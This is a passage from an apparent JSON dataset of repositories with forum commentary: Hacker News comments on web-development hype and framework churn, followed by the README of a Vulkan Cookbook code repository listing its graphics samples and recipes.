decisions are always when I understand what I am gaining at the expense of what it costs me. I try to remember that every new thing tries, rightfully so, to put its best foot forward and if I fail to do my due diligence in evaluating its offerings compared to my needs that I am doing myself a disservice.I fully admit that I too sometimes find the noise of all the enthusiasm to be a bit taxing but I try to remind myself that I hear all the noise because I am excited about web dev. In the times where I am not tired of the noise I am seeking more and more of the latest and greatest. So I try to remind myself it\u2019s ok to not pay attention to every single thing; not knowing about one particular thing will not prohibit me from making great things with what I do know.It sounds like you are enjoying webdev so my advice is to do just that and remember that all the hype is just someone else\u2019s passion for webdev too.Front end development is particularly prone to the hype cycle. Other parts of the stack are a little more stable in their tooling. I personally believe this is because the front end ecosystem is comprised of more self taught and boot camp people. They\u2019re super excited to do development and live on hype, whereas other areas are still more likely to be classically trained computer scientists and engineers that are less hype prone.\n This is of course a super over generalization and you can find tons of exceptions but if you look at the industry overall this is why I see it happening.I started off doing web development back in the late 90s, at first using Frontpage, then progressing to HTML. In the early 2000s, I was writing PHP and using MySQL.I started doing web dev again around the Great Recession. Originally I was using CakePHP, but Microsoft offered my firm massive discounts on various licensing if we went all in on .NET.So all new things were written in C# ASP.net, and I honestly can\u2019t remember the specific framework.In the last decade, I had some on and off web projects. I remember using Angular. Then React. There were various build tools, minification configs, CSS frameworks. The deployment scripts just copied a bundle of files and threw them to a specific location on a machine.Anyway, the more interesting problems I solved in any kind of \u201cweb development\u201d was around scaling\u2026 using CDNs for assets, using load balancers, having an entire fleet of servers, staggered deployments, canaries, metrics, dashboards, monitors and alarms, etc.This is really what the complexity was. And a few times we dabbled in \u201cwrite once, run anywhere\u201d so we could share code on iOS and Android. It was really a function of, who are the staff engineers and do they prefer HTML, native stacks, or whatever framework,Having said all that, I never understood the endless complexity in the raw web stack. Too many frameworks, too much tooling, and they\u2019re optimizing for what exactly?My take is that the barrier to entry in the web space was always low. You don\u2019t need to really know data structures and algorithms to get started. And so with the influx of new people in the space, everyone has their tastes and preferences. But 90% of these use cases are not that different from the PHP and MySQL work I was doing. Except now there are entire industries around mastering whatever framework, youtube channels, etc etc. it\u2019s a variety of microcultures.Partly I think if you have experience in web dev, you learn to recognize which frameworks/technologies are worth pursuing and which are not.It's also worth noting, some of it comes down to personal preference and purpose of the project.If you're just dabbling, stick with something battle-tested, and if you aren't sure what that is, phone a friend. Or post on HN...IMO: the cycle largely doesn't matter and can be ignored... hear me out.Been a web dev since the 90s, on and off, since before Javascript was invented. Twenty years later, it's still largely HTML and CSS, with JS globbed on. Here's the thing: the web, by its very nature, is a mountain of hacks on top of hacks on top of hacks, the result of having way too many cooks in the kitchen with no recipe. It just evolved organically, messily, clobbering different use cases together over time, all through mutating the HTML DOM -- little more than a glorified rich text doc.Web dev is a craft wide as an ocean, shallow as a puddle. Whatever framework you use or don't use, at the end of the day you're just moving boxes/divs around and highlighting buttons and such. The complexity you see in the toolchain and frameworks is because JS and HTML are so barebones that you can't really do a lot of traditional software stuff with it easily, having to reinvent everything from routing to state management to basic network stuff... not to mention reinvent a backend. So each major tech company or small business or mid-sized SaaS provider sets out to solve some tiny part of it, either to make a name for themselves or to just make some internal workflow easier. The successful ones either see widespread adoption (React) or become part of the ECMAScript specs eventually (fetch, Web Components). And many companies try to invent their own version of an idealized backend, each having some 80% overlap with other major backends, but none that are 100% the best for all uses cases, so now you get to pick and choose from a hundred imperfect solutions rather than one best practice.But so what? It largely doesn't matter.Web dev has an incredibly low barrier to entry. Anybody can learn the basics in a few weeks, largely for free, and get a paying job with not much effort. AND it has a pretty low skill ceiling, unless you choose to specialize down a path of (say) DevOps or DB engineer or some backend stack, or start diving into one of the web-adjacent APIs (WASM, WebGL, Canvas). If you just focus on the frontend DOM, it doesn't really matter whether you use vanilla, jQuery, React, Angular, Vue, Svelte... it's all just HTML and JS in the end.This field has incredible turnover: in frameworks, yes, but also in developers themselves, in managers, in companies, in fashions. As you pointed out, yesterday's \"best practices\" are today's \"mistakes to avoid\". Culturally, all of it is ephemeral and so very little of it is mission-critical. Maybe if you're working at an SaaS or IaaS company, you have to plan for 10+ years. But most online businesses just need a fancy catalog or marketing page or knowledge base or whatever, and fundamentally those are just several pages of UIs with a sprinkling of business logic and intertwined states to manage. The challenges are usually in thinking through the architecture and tradeoffs, not necessarily implementing any one framework or another.At the end of the day, no matter which framework you use, they're still just making and mutating HTML. I can pretty much guarantee that whatever you write is going to be obsolete by the time it hits 1.0, because all the underlying packages and frameworks (and possibly languages and APIs) will have evolved by then. But that's OK. That just means your code can be as throwaway as the ecosystem itself... the standards aren't as high as in proper software engineering. You're just marking up a network-enabled Word document, and if something breaks, it's trivial to fix it and all your users will see the fix the next time they load your site. And two years from now, somebody will get paid to rewrite all of it anyway, using a technology you've never heard of.While this can be frustrating, it doesn't have to be... if you just accept that the work is by nature ephemeral, that it's all throwaway code, you don't need to be attached to it anymore. Plan the best you can for a couple years out and the rest isn't up to you. No matter what you do, it's going to be redone very soon. You're not building cathedrals, just sand castles.Alternatively, if you really hate this sort of UI-forward coding, you can also create your own systems of abstraction that architecturally separate business logic from UI code, with a purity of functions that can persist underlying API or framework changes. But then all you really end up doing is creating your own new framework. That's how the web got here in the first place. Everybody keeps trying to abstract away the limitations of the DOM and Javascript.And if you don't like the new shiny, don't chase the new shiny. PHP and Java work largely the same as they did years ago, and still power large portions of the web. If you don't want to ever touch the constantly-mutating frontend, find a company big enough to let you specialize in backend API design and development so you never have to touch HTML, CSS, or JS. If you like the somewhat shiny, just not the bleeding edge, you can totally do that. Just pick React and roll with it... it's already considered old and lame (meaning mature) by this point, so if you start out knowing you're choosing older tech, it won't matter as much that it's still old 2 years later. For the backend stack, there are also very mature technologies that have relatively stabilized. Who cares what the new kids on the block are doing? If you're not working at multi-million dollar company who own their own data centers and resell their architectures to other companies, nobody is really going to care all that much about your stack, because it's unlikely to be perfect to begin with and it's not going to survive turnover very long. Again, it's all ephemeral, and that's OK. Don't let the perfect be the enemy of the good.Learning to love the web is learning to love short-lived mediocrity. You're just speed-dating, not marrying a framework. It's all going to be thrown away in a couple years, and nobody will remember or care why you did what you did. That's OK. You won't remember or care either. Just move on then and do something new somewhere else... you're getting paid along the way, and hopefully enjoying yourself enough. Don't worry about the future so much. Nobody else in the web ecosystem does, lol.TypeScript is amazing though. I\u2019d sell my soul to Microsoft for TypeScript lol.Jokes aside, there are compile to JS languages that are really good and open source like ReScript.> the main reason is that Microsoft controls it - in contrast with say Go or Rust where it's controlled by a foundationTo my knowledge, and according to the website, Go is effectively entirely controlled by Google, not a foundation.I don\u2019t have anything to do with web development (and detest web applications and the idea of browsers as an application runtime) but use TypeScript elsewhere - any comparison to coffeescript seems misplaced. TS at this point is simply far too popular and widely used industry-wide to disappear, whereas coffeescript was always niche.honestly, it sounds like you need to take a vacation so these very common issues don\u2019t feel overpowering.\u201cendless\u201d is the problem, not that the technology moves forward.you need to make space for yourself to exist outside of work, and carve out time to keep up with where the industry is going.what you\u2019re describing will lead to burnout because you\u2019re always comparing or second guessing what you use and what you know to what someone/something else.Anybody can sign up to OpenAI and mess with their Playground.ask it to draw its neural net design by asci code", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "PacktPublishing/Vulkan-Cookbook", "link": "https://github.com/PacktPublishing/Vulkan-Cookbook", "tags": ["vulkan", "vulkan-api", "vulkan-demos", "cpp"], "stars": 646, "description": "Code repository for Vulkan Cookbook by Packt", "lang": "C++", "repo_lang": "", "readme": "\n\n\n# Vulkan Cookbook\nThis is the code repository for [Vulkan Cookbook](https://www.packtpub.com/game-development/vulkan-cookbook?utm_source=github&utm_medium=repository&utm_campaign=9781786468154), published by [Packt](https://www.packtpub.com/). All the example workflows that are mentioned in the book are present in the package.\n\n## About the Book\nVulkan is the next generation graphics API released by the Khronos group. It is expected to be the successor to OpenGL and OpenGL ES, which it shares some similarities with such as its cross-platform capabilities, programmable pipeline stages, or nomenclature. Vulkan is a low-level API that gives developers much more control over the hardware, but also adds new responsibilities such as explicit memory and resources management. With it, though, Vulkan is expected to be much faster.\n\n### Related Books\n\n* [Vulkan Programming [Video]](https://www.packtpub.com/application-development/vulkan-programming-video?utm_source=github&utm_medium=repository&utm_campaign=9781786460714)\n\n* [Learning Vulkan](https://www.packtpub.com/application-development/learning-vulkan?utm_source=github&utm_medium=repository&utm_campaign=9781786469809)\n\n* [Building an Unreal RTS Game: The Basics [Video]](https://www.packtpub.com/application-development/building-unreal-rts-game-basics-video?utm_source=github&utm_medium=repository&utm_campaign=9781787285279)\n\n### Suggestions and Feedback\n [Click here](https://docs.google.com/forms/d/e/1FAIpQLSe5qwunkGf6PUvzPirPDtuy1Du5Rlzew23UBp2S-P3wB-GcwQ/viewform) if you have any feedback or suggestions.\n\n
\n\n## Credits\n### Special thanks for authors and developers of the following projects and resources:\n* [**tinyobjloader**](https://github.com/syoyo/tinyobjloader) - A single-header library for loading Wavefront OBJ files.\n* [**stb image**](https://github.com/nothings/stb) - A single-header library for loading image files (other libraries are also available).\n* [**Humus**](http://www.humus.name/index.php?page=Textures) - A large collection of cubemaps (and other resources).\n\n
\n\n## Please note!\n### Currently only Windows operating system is supported. Linux version is being prepared and should be ready soon.\n\n
\n\n# [Samples](./Samples/Source%20Files/)\n\n## [Chapter 11 - Lighting](./Samples/Source%20Files/11%20Lighting/)\n\n\n\n* ### [01 - Rendering a geometry with vertex diffuse lighting](./Samples/Source%20Files/11%20Lighting/01-Rendering_a_geometry_with_vertex_diffuse_lighting/main.cpp)\n\nSample showing how to implement a diffuse lighting algorithm calculated only at geometry's verices using vertex shaders.
\nLeft mouse button: rotate the scene\n\n\n\n* ### [02 - Rendering a geometry with fragment specular lighting](./Samples/Source%20Files/11%20Lighting/02-Rendering_a_geometry_with_fragment_specular_lighting/main.cpp)\n\nThis sample present the Phong specular lighting algorithm implemented on vertex and fragment shaders.
\nLeft mouse button: rotate the scene\n\n\n\n* ### [03 - Rendering a normal mapped geometry](./Samples/Source%20Files/11%20Lighting/03-Rendering_a_normal_mapped_geometry/main.cpp)\n\nHere a normal mapping technique is presented and the model is lit using the specular lighting algorithm.
\nLeft mouse button: rotate the scene\n\n\n\n* ### [04 - Rendering a reflective and refractive geometry using cubemaps](./Samples/Source%20Files/11%20Lighting/04-Rendering_a_reflective_and_refractive_geometry_using_cubemaps/main.cpp)\n\nSample presenting how to use cubemaps to render a transparent geometry that both reflects and refracts environment.
\nLeft mouse button: rotate the scene\n\n\n\n* ### [05 - Adding shadows to the scene](./Samples/Source%20Files/11%20Lighting/05-Adding_shadows_to_the_scene/main.cpp)\n\nIn this sample a basic shadow mapping algorithm is shown. In the first render pass a shadow map is generated. In the second render pass a scene is rendered and the data from the shadow map is used to check, whether the geometry is lit or covered in shadow.
\nLeft mouse button: rotate the scene
\nRight mouse button: move the light\n\n## [Chapter 12 - Advanced Rendering Techniques](./Samples/Source%20Files/12%20Advanced%20Rendering%20Techniques/)\n\n\n\n* ### [01 - Drawing a skybox](./Samples/Source%20Files/12%20Advanced%20Rendering%20Techniques/01-Drawing_a_skybox/main.cpp)\n\nHere it is shown how to draw a skybox, which simulates background - objects seen in a distance and/or a sky.
\nLeft mouse button: look around\n\n\n\n* ### [02 - Drawing bilboards using geometry shaders](./Samples/Source%20Files/12%20Advanced%20Rendering%20Techniques/02-Drawing_bilboards_using_geometry_shaders/main.cpp)\n\nThis sample presents a way of drawing sprites or bilboards - flat, textured quads that are always facing the camera.
\nLeft mouse button: rotate the scene\n\n\n\n* ### [03 - Drawing particles using compute and graphics pipelines](./Samples/Source%20Files/12%20Advanced%20Rendering%20Techniques/03-Drawing_particles_using_compute_and_graphics_pipelines/main.cpp)\n\nHere an example of rendering particles is shown. Compute shaders are used to calculate positions of all particles in the system. Particles are rendered as flat bilboards (sprites).
\nLeft mouse button: rotate the scene\n\n\n\n* ### [04 - Rendering a tesselated terrain](./Samples/Source%20Files/12%20Advanced%20Rendering%20Techniques/04-Rendering_a_tesselated_terrain/main.cpp)\n\nThis code sample shows one of the ways to draw a terrain. A complete graphics pipeline with all five programmable stages is used that tessellates the terrain near the camera to improve its complexity, with level of details faiding away with increasing distance from the camera, and with a flat shading lighting algorithm.
\nLeft mouse button: rotate the scene
\nMouse wheel: zoom in / zoom out\n\n\n\n* ### [05 - Rendering a fullscreen quad for postprocessing](./Samples/Source%20Files/12%20Advanced%20Rendering%20Techniques/05-Rendering_a_fullscreen_quad_for_postprocessing/main.cpp)\n\nSample presenting a fast and easy way to prepare an image postprocessing phase in a graphics pipeline - by using a fullscreen quad drawn already in a clip space. An edge detection algorithm is shown as on of the examples of postprocessing techniques.\n\n\n\n* ### [06 - Using an input attachment for color correction postprocess effect](./Samples/Source%20Files/12%20Advanced%20Rendering%20Techniques/06-Using_input_attachment_for_color_correction_postprocess_effect/main.cpp)\n\nIn this code another postprocessing technique is shown that uses one of the Vulkan's specific features - input attachments, which allow reading data from render targets (attachments) in the same render pass.
\nLeft mouse button: rotate the scene\n\n## [Other](./Samples/Source%20Files/Other/)\n\n\n\n* ### [01 - Creating a logical device](./Samples/Source%20Files/Other/01-Creating_Logical_Device/main.cpp)\n\nCode sample that shows basic Vulkan setup - instance creation, physical device enumeration and logical device creation.\n\n\n\n* ### [02 - Creating a swapchain](./Samples/Source%20Files/Other/02-Creating_Swapchain/main.cpp)\n\nHere a swapchain object is created, which allows us to render a scene directly to an application's window.\n\n\n\n* ### [03 - Using render passes](./Samples/Source%20Files/Other/03-Using_Render_Passes/main.cpp)\n\nThis example shows how to preapre a basic render pass - a description of attachments (render targets) needed to render a geometry.\n\n\n\n* ### [04 - Using a graphics pipeline](./Samples/Source%20Files/Other/04-Using_Graphics_Pipeline/main.cpp)\n\nSample showing how to create a graphics pipeline, setup its multiple parameters and use it to draw a scene.\n\n\n\n* ### [05 - Using combined image samplers](./Samples/Source%20Files/Other/05-Using_Combined_Image_Samplers/main.cpp)\n\nHere descriptor sets are introduced. They are required to setup an interface between application and a pipeline and to provide images (textures) to shaders.\n\n\n\n* ### [06 - Using uniform buffers](./Samples/Source%20Files/Other/06-Using_Uniform_Buffers/main.cpp)\n\nAnother example of using descriptor sets, but this time it presented how to prepare transformation matrices and provide them to shaders.\n\n\n\n* ### [07 - Using push constants](./Samples/Source%20Files/Other/07-Using_Push_Constants/main.cpp)\n\nThis code sample presents a very fast and easy way to provide data to shaders - push constants. Though the provided data may not be too big, they are ideal for performing frequent updates.\n\n\n\n* ### [08 - Using tessellation shaders](./Samples/Source%20Files/Other/08-Using_Tessellation_Shaders/main.cpp)\n\nHere we can see how to create a graphics pipeline with tessellation control and evaluation shaders enabled responsible for increasing the complexity of a rendered geometry.\n\n\n\n* ### [09 - Using geometry shaders](./Samples/Source%20Files/Other/09-Using_Geometry_Shaders/main.cpp)\n\nSample presenting how to use geometry shaders and generate new primitives instead of those drawn in an application.\n\n\n\n* ### [10 - Using compute shaders](./Samples/Source%20Files/Other/10-Using_Compute_Shaders/main.cpp)\n\nThis code sample shows how to create a compute pipeline - the second type of pipelines supported in the Vulkan API. It allows us to perform mathematical computations.\n\n\n\n* ### [11 - Drawing vertex normals](./Samples/Source%20Files/Other/11-Drawing_Vertex_Normals/main.cpp)\n\nHere a commonly used debugging technique is presented that uses geometry shaders to display normal vectors provided by the application.\n\n\n\n* ### [12 - Using depth attachments](./Samples/Source%20Files/Other/12-Using_Depth_Attachments/main.cpp)\n\nIn this example we can see how to setup a render pass, framebufer and a graphics pipeline to use depth attachment and enable depth test during drawing.\n\n\n\n* ### [13 - Enabling alpha blending](./Samples/Source%20Files/Other/13-Enabling_Alpha_Blending/main.cpp)\n\nThis code sample shows how to enable alpha blending (transparency) in a graphics pipeline.
\nLeft mouse button: disable/enable blending
\n\n\n\n* ### [14 Drawing Single Fullscreen Triangle For Postprocessing](./Samples/Source%20Files/Other/14-Drawing_Single_Fullscreen_Triangle_For_Postprocessing/main.cpp)\n\nThis sample shows an alternative for performing a postprocessing with a quad (two triangles). Here a single triangle covering the whole screen is used to apply a grayscale effect.
\n\n
\n\n# [Recipes Library](./Library/Source%20Files/)\n\n## [Chapter 01 - Instance and Devices](./Library/Source%20Files/01%20Instance%20and%20Devices/)\n\n* [03 - Connecting with a Vulkan Loader library](./Library/Source%20Files/01%20Instance%20and%20Devices/03%20Connecting%20with%20a%20Vulkan%20Loader%20library.cpp)\n\n* [05 - Loading function exported from a Vulkan Loader library](./Library/Source%20Files/01%20Instance%20and%20Devices/05%20Loading%20function%20exported%20from%20a%20Vulkan%20Loader%20library.cpp)\n\n* [06 - Loading global-level functions](./Library/Source%20Files/01%20Instance%20and%20Devices/06%20Loading%20global-level%20functions.cpp)\n\n* [07 - Checking available Instance extensions](./Library/Source%20Files/01%20Instance%20and%20Devices/07%20Checking%20available%20Instance%20extensions.cpp)\n\n* [08 - Creating a Vulkan Instance](./Library/Source%20Files/01%20Instance%20and%20Devices/08%20Creating%20a%20Vulkan%20Instance.cpp)\n\n* [09 - Loading instance-level functions](./Library/Source%20Files/01%20Instance%20and%20Devices/09%20Loading%20instance-level%20functions.cpp)\n\n* [10 - Enumerating available physical devices](./Library/Source%20Files/01%20Instance%20and%20Devices/10%20Enumerating%20available%20physical%20devices.cpp)\n\n* [11 - Checking available device extensions](./Library/Source%20Files/01%20Instance%20and%20Devices/11%20Checking%20available%20device%20extensions.cpp)\n\n* [12 - Getting features and properties of a physical device](./Library/Source%20Files/01%20Instance%20and%20Devices/12%20Getting%20features%20and%20properties%20of%20a%20physical%20device.cpp)\n\n* [13 - Checking available queue families and their properties](./Library/Source%20Files/01%20Instance%20and%20Devices/13%20Checking%20available%20queue%20families%20and%20their%20properties.cpp)\n\n* [14 - Selecting index of a queue family with desired capabilities](./Library/Source%20Files/01%20Instance%20and%20Devices/14%20Selecting%20index%20of%20a%20queue%20family%20with%20desired%20capabilities.cpp)\n\n* [15 - Creating a logical device](./Library/Source%20Files/01%20Instance%20and%20Devices/15%20Creating%20a%20logical%20device.cpp)\n\n* [16 - Loading device-level functions](./Library/Source%20Files/01%20Instance%20and%20Devices/16%20Loading%20device-level%20functions.cpp)\n\n* [17 - Getting a device queue](./Library/Source%20Files/01%20Instance%20and%20Devices/17%20Getting%20a%20device%20queue.cpp)\n\n* [18 - Creating a logical device with geometry shaders and graphics queue](./Library/Source%20Files/01%20Instance%20and%20Devices/18%20Creating%20a%20logical%20device%20with%20geometry%20shaders%20and%20graphics%20queue.cpp)\n\n* [19 - Destroying a logical device](./Library/Source%20Files/01%20Instance%20and%20Devices/19%20Destroying%20a%20logical%20device.cpp)\n\n* [20 - Destroying a Vulkan Instance](./Library/Source%20Files/01%20Instance%20and%20Devices/20%20Destroying%20a%20Vulkan%20Instance.cpp)\n\n* [21 - Releasing a Vulkan Loader library](./Library/Source%20Files/01%20Instance%20and%20Devices/21%20Releasing%20a%20Vulkan%20Loader%20library.cpp)\n\n## [Chapter 02 - Image Presentation](./Library/Source%20Files/02%20Image%20Presentation/)\n\n* [01 - Creating a Vulkan Instance with WSI extensions enabled](./Library/Source%20Files/02%20Image%20Presentation/01%20Creating%20a%20Vulkan%20Instance%20with%20WSI%20extensions%20enabled.cpp)\n\n* [02 - Creating a presentation surface](./Library/Source%20Files/02%20Image%20Presentation/02%20Creating%20a%20presentation%20surface.cpp)\n\n* [03 - Selecting a queue family that supports presentation to a given surface](./Library/Source%20Files/02%20Image%20Presentation/03%20Selecting%20a%20queue%20family%20that%20supports%20presentation%20to%20a%20given%20surface.cpp)\n\n* [04 - Creating a logical device with WSI extensions enabled](./Library/Source%20Files/02%20Image%20Presentation/04%20Creating%20a%20logical%20device%20with%20WSI%20extensions%20enabled.cpp)\n\n* [05 - Selecting a desired presentation mode](./Library/Source%20Files/02%20Image%20Presentation/05%20Selecting%20a%20desired%20presentation%20mode.cpp)\n\n* [06 - Getting capabilities of a presentation surface](./Library/Source%20Files/02%20Image%20Presentation/06%20Getting%20capabilities%20of%20a%20presentation%20surface.cpp)\n\n* [07 - Selecting a number of swapchain images](./Library/Source%20Files/02%20Image%20Presentation/07%20Selecting%20a%20number%20of%20swapchain%20images.cpp)\n\n* [08 - Choosing a size of swapchain images](./Library/Source%20Files/02%20Image%20Presentation/08%20Choosing%20a%20size%20of%20swapchain%20images.cpp)\n\n* [09 - Selecting desired usage scenarios of swapchain images](./Library/Source%20Files/02%20Image%20Presentation/09%20Selecting%20desired%20usage%20scenarios%20of%20swapchain%20images.cpp)\n\n* [10 - Selecting a transformation of swapchain images](./Library/Source%20Files/02%20Image%20Presentation/10%20Selecting%20a%20transformation%20of%20swapchain%20images.cpp)\n\n* [11 - Selecting a format of swapchain images](./Library/Source%20Files/02%20Image%20Presentation/11%20Selecting%20a%20format%20of%20swapchain%20images.cpp)\n\n* [12 - Creating a swapchain](./Library/Source%20Files/02%20Image%20Presentation/12%20Creating%20a%20swapchain.cpp)\n\n* [13 - Getting handles of swapchain images](./Library/Source%20Files/02%20Image%20Presentation/13%20Getting%20handles%20of%20swapchain%20images.cpp)\n\n* [14 - Creating a swapchain with R8G8B8A8 format and a MAILBOX present mode](./Library/Source%20Files/02%20Image%20Presentation/14%20Creating%20a%20swapchain%20with%20R8G8B8A8%20format%20and%20a%20MAILBOX%20present%20mode.cpp)\n\n* [15 - Acquiring a swapchain image](./Library/Source%20Files/02%20Image%20Presentation/15%20Acquiring%20a%20swapchain%20image.cpp)\n\n* [16 - Presenting an image](./Library/Source%20Files/02%20Image%20Presentation/16%20Presenting%20an%20image.cpp)\n\n* [17 - Destroying a swapchain](./Library/Source%20Files/02%20Image%20Presentation/17%20Destroying%20a%20swapchain.cpp)\n\n* [18 - Destroying a presentation surface](./Library/Source%20Files/02%20Image%20Presentation/18%20Destroying%20a%20presentation%20surface.cpp)\n\n## [Chapter 03 - Command Buffers and Synchronization](./Library/Source%20Files/03%20Command%20Buffers%20and%20Synchronization/)\n\n* [01 - Creating a command pool](./Library/Source%20Files/03%20Command%20Buffers%20and%20Synchronization/01%20Creating%20a%20command%20pool.cpp)\n\n* [02 - Allocating command buffers](./Library/Source%20Files/03%20Command%20Buffers%20and%20Synchronization/02%20Allocating%20command%20buffers.cpp)\n\n* [03 - Beginning a command buffer recording operation](./Library/Source%20Files/03%20Command%20Buffers%20and%20Synchronization/03%20Beginning%20a%20command%20buffer%20recording%20operation.cpp)\n\n* [04 - Ending a command buffer recording operation](./Library/Source%20Files/03%20Command%20Buffers%20and%20Synchronization/04%20Ending%20a%20command%20buffer%20recording%20operation.cpp)\n\n* [05 - Resetting a command buffer](./Library/Source%20Files/03%20Command%20Buffers%20and%20Synchronization/05%20Resetting%20a%20command%20buffer.cpp)\n\n* [06 - Resetting a command pool](./Library/Source%20Files/03%20Command%20Buffers%20and%20Synchronization/06%20Resetting%20a%20command%20pool.cpp)\n\n* [07 - Creating a semaphore](./Library/Source%20Files/03%20Command%20Buffers%20and%20Synchronization/07%20Creating%20a%20semaphore.cpp)\n\n* [08 - Creating a fence](./Library/Source%20Files/03%20Command%20Buffers%20and%20Synchronization/08%20Creating%20a%20fence.cpp)\n\n* [09 - Waiting for fences](./Library/Source%20Files/03%20Command%20Buffers%20and%20Synchronization/09%20Waiting%20for%20fences.cpp)\n\n* [10 - Resetting fences](./Library/Source%20Files/03%20Command%20Buffers%20and%20Synchronization/10%20Resetting%20fences.cpp)\n\n* [11 - Submitting command buffers to the queue](./Library/Source%20Files/03%20Command%20Buffers%20and%20Synchronization/11%20Submitting%20command%20buffers%20to%20the%20queue.cpp)\n\n* [12 - Synchronizing two command buffers](./Library/Source%20Files/03%20Command%20Buffers%20and%20Synchronization/12%20Synchronizing%20two%20command%20buffers.cpp)\n\n* [13 - Checking if processing of a submitted command buffer has finished](./Library/Source%20Files/03%20Command%20Buffers%20and%20Synchronization/13%20Checking%20if%20processing%20of%20a%20submitted%20command%20buffer%20has%20finished.cpp)\n\n* [14 - Waiting until all commands submitted to a queue are finished](./Library/Source%20Files/03%20Command%20Buffers%20and%20Synchronization/14%20Waiting%20until%20all%20commands%20submitted%20to%20a%20queue%20are%20finished.cpp)\n\n* [15 - Waiting for all submitted commands to be finished](./Library/Source%20Files/03%20Command%20Buffers%20and%20Synchronization/15%20Waiting%20for%20all%20submitted%20commands%20to%20be%20finished.cpp)\n\n* [16 - Destroying a fence](./Library/Source%20Files/03%20Command%20Buffers%20and%20Synchronization/16%20Destroying%20a%20fence.cpp)\n\n* [17 - Destroying a semaphore](./Library/Source%20Files/03%20Command%20Buffers%20and%20Synchronization/17%20Destroying%20a%20semaphore.cpp)\n\n* [18 - Freeing command buffers](./Library/Source%20Files/03%20Command%20Buffers%20and%20Synchronization/18%20Freeing%20command%20buffers.cpp)\n\n* [19 - Destroying a command pool](./Library/Source%20Files/03%20Command%20Buffers%20and%20Synchronization/19%20Destroying%20a%20command%20pool.cpp)\n\n## [Chapter 04 - Resources and Memory](./Library/Source%20Files/04%20Resources%20and%20Memory/)\n\n* [01 - Creating a buffer](./Library/Source%20Files/04%20Resources%20and%20Memory/01%20Creating%20a%20buffer.cpp)\n\n* [02 - Allocating and binding memory object to a buffer](./Library/Source%20Files/04%20Resources%20and%20Memory/02%20Allocating%20and%20binding%20memory%20object%20to%20a%20buffer.cpp)\n\n* [03 - Setting a buffer memory barrier](./Library/Source%20Files/04%20Resources%20and%20Memory/03%20Setting%20a%20buffer%20memory%20barrier.cpp)\n\n* [04 - Creating a buffer view](./Library/Source%20Files/04%20Resources%20and%20Memory/04%20Creating%20a%20buffer%20view.cpp)\n\n* [05 - Creating an image](./Library/Source%20Files/04%20Resources%20and%20Memory/05%20Creating%20an%20image.cpp)\n\n* [06 - Allocating and binding memory object to an image](./Library/Source%20Files/04%20Resources%20and%20Memory/06%20Allocating%20and%20binding%20memory%20object%20to%20an%20image.cpp)\n\n* [07 - Setting an image memory barrier](./Library/Source%20Files/04%20Resources%20and%20Memory/07%20Setting%20an%20image%20memory%20barrier.cpp)\n\n* [08 - Creating an image view](./Library/Source%20Files/04%20Resources%20and%20Memory/08%20Creating%20an%20image%20view.cpp)\n\n* [09 - Creating a 2D image and view](./Library/Source%20Files/04%20Resources%20and%20Memory/09%20Creating%20a%202D%20image%20and%20view.cpp)\n\n* [10 - Creating a layered 2D image with a CUBEMAP view](./Library/Source%20Files/04%20Resources%20and%20Memory/10%20Creating%20a%20layered%202D%20image%20with%20a%20CUBEMAP%20view.cpp)\n\n* [11 - Mapping, updating and unmapping host-visible memory](./Library/Source%20Files/04%20Resources%20and%20Memory/11%20Mapping,%20updating%20and%20unmapping%20host-visible%20memory.cpp)\n\n* [12 - Copying data between buffers](./Library/Source%20Files/04%20Resources%20and%20Memory/12%20Copying%20data%20between%20buffers.cpp)\n\n* [13 - Copying data from a buffer to an image](./Library/Source%20Files/04%20Resources%20and%20Memory/13%20Copying%20data%20from%20a%20buffer%20to%20an%20image.cpp)\n\n* [14 - Copying data from an image to a buffer](./Library/Source%20Files/04%20Resources%20and%20Memory/14%20Copying%20data%20from%20an%20image%20to%20a%20buffer.cpp)\n\n* [15 - Using staging buffer to update a buffer with a device-local memory bound](./Library/Source%20Files/04%20Resources%20and%20Memory/15%20Using%20staging%20buffer%20to%20update%20a%20buffer%20with%20a%20device-local%20memory%20bound.cpp)\n\n* [16 - Using staging buffer to update an image with a device-local memory bound](./Library/Source%20Files/04%20Resources%20and%20Memory/16%20Using%20staging%20buffer%20to%20update%20an%20image%20with%20a%20device-local%20memory%20bound.cpp)\n\n* [17 - Destroying an image view](./Library/Source%20Files/04%20Resources%20and%20Memory/17%20Destroying%20an%20image%20view.cpp)\n\n* [18 - Destroying an image](./Library/Source%20Files/04%20Resources%20and%20Memory/18%20Destroying%20an%20image.cpp)\n\n* [19 - Destroying a buffer view](./Library/Source%20Files/04%20Resources%20and%20Memory/19%20Destroying%20a%20buffer%20view.cpp)\n\n* [20 - Freeing a memory object](./Library/Source%20Files/04%20Resources%20and%20Memory/20%20Freeing%20a%20memory%20object.cpp)\n\n* [21 - Destroying a buffer](./Library/Source%20Files/04%20Resources%20and%20Memory/21%20Destroying%20a%20buffer.cpp)\n\n## [Chapter 05 - Descriptor Sets](./Library/Source%20Files/05%20Descriptor%20Sets/)\n\n* [01 - Creating a sampler](./Library/Source%20Files/05%20Descriptor%20Sets/01%20Creating%20a%20sampler.cpp)\n\n* [02 - Creating a sampled image](./Library/Source%20Files/05%20Descriptor%20Sets/02%20Creating%20a%20sampled%20image.cpp)\n\n* [03 - Creating a combined image sampler](./Library/Source%20Files/05%20Descriptor%20Sets/03%20Creating%20a%20combined%20image%20sampler.cpp)\n\n* [04 - Creating a storage image](./Library/Source%20Files/05%20Descriptor%20Sets/04%20Creating%20a%20storage%20image.cpp)\n\n* [05 - Creating a uniform texel buffer](./Library/Source%20Files/05%20Descriptor%20Sets/05%20Creating%20a%20uniform%20texel%20buffer.cpp)\n\n* [06 - Creating a storage texel buffer](./Library/Source%20Files/05%20Descriptor%20Sets/06%20Creating%20a%20storage%20texel%20buffer.cpp)\n\n* [07 - Creating a uniform buffer](./Library/Source%20Files/05%20Descriptor%20Sets/07%20Creating%20a%20uniform%20buffer.cpp)\n\n* [08 - Creating a storage buffer](./Library/Source%20Files/05%20Descriptor%20Sets/08%20Creating%20a%20storage%20buffer.cpp)\n\n* [09 - Creating an input attachment](./Library/Source%20Files/05%20Descriptor%20Sets/09%20Creating%20an%20input%20attachment.cpp)\n\n* [10 - Creating a descriptor set layout](./Library/Source%20Files/05%20Descriptor%20Sets/10%20Creating%20a%20descriptor%20set%20layout.cpp)\n\n* [11 - Creating a descriptor pool](./Library/Source%20Files/05%20Descriptor%20Sets/11%20Creating%20a%20descriptor%20pool.cpp)\n\n* [12 - Allocating descriptor 